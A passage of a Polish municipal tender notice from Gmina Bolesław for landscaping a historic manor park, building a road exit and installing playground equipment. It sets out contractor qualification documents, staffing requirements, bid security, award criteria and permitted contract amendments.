3.Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia  społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.


1)Dokumenty składane przez wykonawcę, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów:
A)jak w punkcie XIII 9 SIWZ - składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania  lub miejsce zamieszkania ma osoba , której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust.1 pkt. 13, 14 i 21 oraz ust. 5 pkt. 5 i 6 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
B)jak w punkcie XIII 10 i 11 SIWZ składa dokument lub dokumenty wystawione w kraju,  w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
b)nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
  
2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 
w tym:
1) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia:
 A) dla Zadania nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego.
a)Wykonawca wykaże dysponowanie osobami zdolnymi do realizacji zamówienia,                w tym:
- osobą na stanowisku Kierownika budowy, posiadającą uprawnienia budowlane 
np.  do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej*

-osobą na stanowisku Kierownika robót elektrycznych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych *

-osobą na stanowisku Kierownika robót drogowych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej *
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  Załącznik nr 2 do SIWZ
  
Wykazane osoby powinny aktualnie przynależeć  do właściwej izby samorządu zawodowego, natomiast osoba na stanowisku kierownika budowy winna wykazać, że przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury**.  

* w rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie( Dz. U. z 2014 r., poz.1278).
**    w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2014 r. , poz.1446 ze zm.).

B)dla Zadania nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni

a)Wykonawca wykaże dysponowanie osobami zdolnymi do realizacji zamówienia, 
w tym:
- osobą na stanowisku Kierownika robót, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, których program obejmuje zajęcia lub grupy zajęć umożliwiające nabycie wiedzy i umiejętności w tym zakresie, oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych studiów magisterskich, przez co najmniej 9  miesięcy brała udział w pracach konserwatorskich lub pracach restauratorskich prowadzonych przy tego rodzaju zabytkach wpisanych do rejestru, lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury**.  

- osobą , która będzie wykonywała samodzielne prace o charakterze technicznym ( nasadzenia zieleni),  która posiada świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni, albo przez co najmniej 9 miesięcy brała udział w tego rodzaju pracach prowadzonych przy zabytkach wpisanych do rejestru lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury**.

**  w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2014 r. , poz.1446 ze zm.).

2) Wykaz robót budowlanych/usług
A) dla Zadania nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego.
a)Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał min. jedną robotę budowlaną w zakresie wykonania zagospodarowania terenu obejmującego łącznie montaż lub budowę obiektów małej architektury, ogrodzenia, budowę lub przebudowę nawierzchni utwardzonej, budowę lub przebudowę oświetlenia parkowego lub drogowego o minimalnej wartości 600 000,00 zł brutto, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów, na rzecz których te roboty zostały wykonane, z załączeniem dowodów, określających, czy roboty te zostały wykonane należycie oraz wskazujących czy zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone - Załącznik nr2 do SIWZ.

B)dla Zadania nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni
a)Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie min.  jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia tj. sadzenie drzew i krzewów o wartości min. 30 000 zł brutto, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których te usługi zostały wykonane, z załączeniem dowodów, określających, czy usługi te zostały wykonane należycie - Załącznik nr 2 do SIWZ.

3) Oświadczenie o korzystaniu przy wykazywaniu spełniania warunków udziału w postępowaniu z zasobów innych podmiotów (jeśli dotyczy):

DOKUMENTY I OŚWIADCZENIA WYMAGANE PRZY POLEGANIU NA ZASOBACH INNYCH PODMIOTÓW - wg pkt XIII D SIWZ:

1.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
2.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając wraz z ofertą zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
3.Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane. W sytuacji, gdy przedmiotem udostępnienia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia (w szczególności wiedza, doświadczenie, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia jako podwykonawcy.
4.Zamawiający ocenia, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt. 1322 i ust. 5 Pzp.
5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.
6.Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
7.Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotu, na zasobach którego polega wykonawca, nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego:
a)zastąpił ten podmiot innym podmiotem lub podmiotami lub
b)zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, 

jeżeli wykaże wymagane zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną odpowiednio innych podmiotów lub własne.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Wypełniony i podpisany formularz oferty - Załącznik nr 1.
2.Kosztorys Ofertowy (uproszczony)sporządzony przez Wykonawcę zgodnie z przedmiarem robót - Załącznik nr 1a do formularza ofertowego (cena kosztorysowa-  zwana w umowie wynagrodzeniem kosztorysowym).
3.Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie (jeśli dotyczy).
1) W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru  pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy.
2) W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 Pzp).
4.Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (jeśli dotyczy).
UWAGA 1:
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie.
Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału 
w postępowaniu oraz brak podstaw wykluczenia.
UWAGA 2:
Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia  art. 22d Pzp.
5.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej
Wyżej wymienione oświadczenie należy złożyć w oparciu o zamieszczony na stronie internetowej Zamawiającego (www.gminaboleslaw.pl) wykaz złożonych w danym postępowaniu ofert, zgodnie z zamieszczonym w SIWZ wzorem (załącznik nr 5), w terminie do 3 dni od dnia upublicznienia na stronie internetowej.


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Oferta składana na przedmiot zamówienia musi być zabezpieczona  wadium w wysokości:
-dla Zadania 1- 20 000,00 zł (słownie: dwadzieścia tysięcy  złotych zero groszy)
-dla Zadania 2- 1 000,00 zł (słownie: jeden tysiąc  złotych zero groszy)
2.Wadium należy wnieść przed upływem terminu składania ofert.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Umowa może zostać zmieniona w wyniku:
a)zmiany wysokości wynagrodzenia będącego wynikiem rozliczenia kosztorysowego,
b)zmiany stawki podatku od towarów i usług,
c)zmiany osób określonych w pkt. VII.2.1.1 i/lub pkt.VII.2.2.1.SIWZ
d)zmiany formy zabezpieczenia należytego wykonania umowy. 
e)zmiany harmonogramu rzeczowo-finansowego, będącego załącznikiem do umowy.
f)zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,
g)zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,
h)zmiany terminu wykonania umowy  lub terminów zawartych w Harmonogramie Rzeczowo-Finansowym w wyniku:
- długotrwałych niesprzyjających warunków atmosferycznych,
- konieczności wykonania robót nie związanych z inwestycją, a niezbędnych do wykonania zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1 -Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego

Zakres rzeczowy zadań obejmuje w szczególności  wykonanie:
- alejek z nawierzchnią z grysu porfirowego o szerokości 2,0 m, zajmujących powierzchnię ok.1 425,13 m2, 
-małej architektury (ławki usytuowane w zatoczkach z grysu porfirowego, kosze na śmieci), 
-ogrodzenia metalowego, ocynkowanego, malowanego proszkowo o szerokości i wysokości przęseł 250x150cm, z bramą i furtką wejściową, 
-oświetlenia  terenu,
-prac rozbiórkowych, 
-zjazdu drogowego,
- placu zabaw o pow. 350,10 m2 z nawierzchnią syntetyczną na podbudowie mineralnej wraz z zamontowaniem 8 szt. zabawek i tablicy informacyjnej wg zestawienia j.n.:

Nr 1  Zestaw zabawowy   na bazie trzech wież  składający się z : 
- wież z daszkiem czterospadowym   3 szt.
- zjeżdżalni 1 szt.
- zjeżdżalni małej 1 szt.
- schodów 1 szt.
- pomostu wysokiego4 szt.
- pomostu średniego4 szt.
- wejścia wspinaczkowego1 szt.
- przeplotni łukowej1 szt.
- drabinki poziomej1 szt.
- pomostu z belką1 szt.
- pomostu linowego1 szt.
- wieży z liną1 szt.
- przejście rurowe1 szt.
Szczegółowy opis Zestawu zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej.

Nr 2  -  Huśtawka wahadłowa podwójna
Huśtawka  wahadłowa podwójna  1 szt.
Szczegółowy opis huśtawki zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr  3   Huśtawka wagowa  konik
Huśtawka wagowa  1 szt.
Szczegółowy opis huśtawki wagowej zawarty został w Specyfikacji Technicznej Wykonania 
i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 4  - Huśtawka wagowa na sprężynach 
Huśtawka wagowa  1 szt.
Szczegółowy opis huśtawki wagowej na sprężynach zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 5 i 6   Sprężynowiec  kaczka, autko
Huśtawka na sprężynie (kaczka, autko) -  2 szt.
Szczegółowy opis sprężynowców zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 7  - Pociąg
Pociąg - zestaw trzyelementowy  1 szt. 
Szczegółowy opis pociągu zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 8  - Karuzela
Karuzela obrotowa  1 szt.
Szczegółowy opis karuzeli zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr  9   Tablica informacyjna
Tablica informacyjna  - Regulamin placu zabaw  1 szt.
Szczegółowy opis tablicy informacyjnej zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.
1. Wykonanie projektu organizacji ruchu dla budowanego zjazdu.
2. Wykonanie oznakowania i zabezpieczeń terenu robót zgodnie z projektem organizacji ruchu.
3. Opracowanie dokumentacji powykonawczej.
4. Wykonanie inwentaryzacji geodezyjnej powykonawczej, poświadczonej za zgodność 
z oryginałem przyjętym do zasobów.
5. Opracowanie na  potrzeby Małopolskiego Konserwatora Zabytków dokumentacji powykonawczej ( w ilości 2 egz.),  przez osobę odpowiedzialną za wykonanie robót budowlanych, obrazującej przebieg robót i zawierającej opracowanie ich wyników w sposób umożliwiający identyfikację i dokładną lokalizację przestrzenną wszystkich czynności, użytych materiałów i dokonanych odkryć (wraz z dokumentacją fotograficzną), oraz zawierającą określenie sposobu postępowania z zabytkiem po zakończeniu wskazanych w pozwoleniu robót budowlanych.
6. Realizowanie przedmiotu umowy zgodnie z Pozwoleniem nr 140/16 z dnia 09.02.2016 r. Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót budowlanych przy zabytku wpisanym do rejestru zabytków.
7. Realizowanie zadania zgodnie z pozwoleniem na budowę - decyzją nr 150/2016 z dnia 22.03.2016 r. Starosty Olkuskiego. 
Uwaga: Gmina Bolesław wykonała wytyczenia geodezyjnego działki  parku w 2016 r. i wskaże, na potrzeby realizacji zadania, przebieg granic.
Szczegółowy opis przedmiotu zamówienia zawierają:
- przedmiary robót 
-specyfikacja techniczna wykonania i odbioru robót budowlanych
-dokumentacja projektowa.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45233200-1,
                    45236210-5,
                    45236290-9,
                    45311000-0,
                    45220000-5,
                    45230000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 06/03/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
